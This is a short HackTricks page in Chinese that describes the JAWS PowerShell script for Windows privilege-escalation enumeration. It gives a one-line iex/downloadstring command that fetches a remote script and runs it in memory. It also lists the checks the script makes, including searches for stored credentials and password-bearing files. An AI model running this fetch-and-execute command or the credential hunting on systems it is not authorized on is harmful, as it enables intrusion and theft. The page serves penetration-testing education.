hacktricks/windows-hardening/windows-local-privilege-escalation/jaws.md
2023-08-03 19:12:22 +00:00

3.7 KiB
Raw Blame History

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

开始

iex(New-Object net.WebClient).downloadstring("https://raw.githubusercontent.com/411Hall/JAWS
/master/jaws-enum.ps1")

信息收集

它不仅检查特权升级的配置错误,还收集有关当前情况的信息。

  • 用户和组
  • 网络接口、arp、端口、防火墙大量输出主机
  • 进程
  • 计划任务(大量输出)
  • 服务(大量输出)
  • 已安装的软件、程序文件夹
  • 补丁
  • 驱动器
  • 最近修改的文件

检查

  • 具有完全控制权限的文件和文件夹
  • 未引用的服务路径
  • 可能有趣的文件
  • 带有密码的系统文件
  • 存储的凭据
☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 YouTube 🎥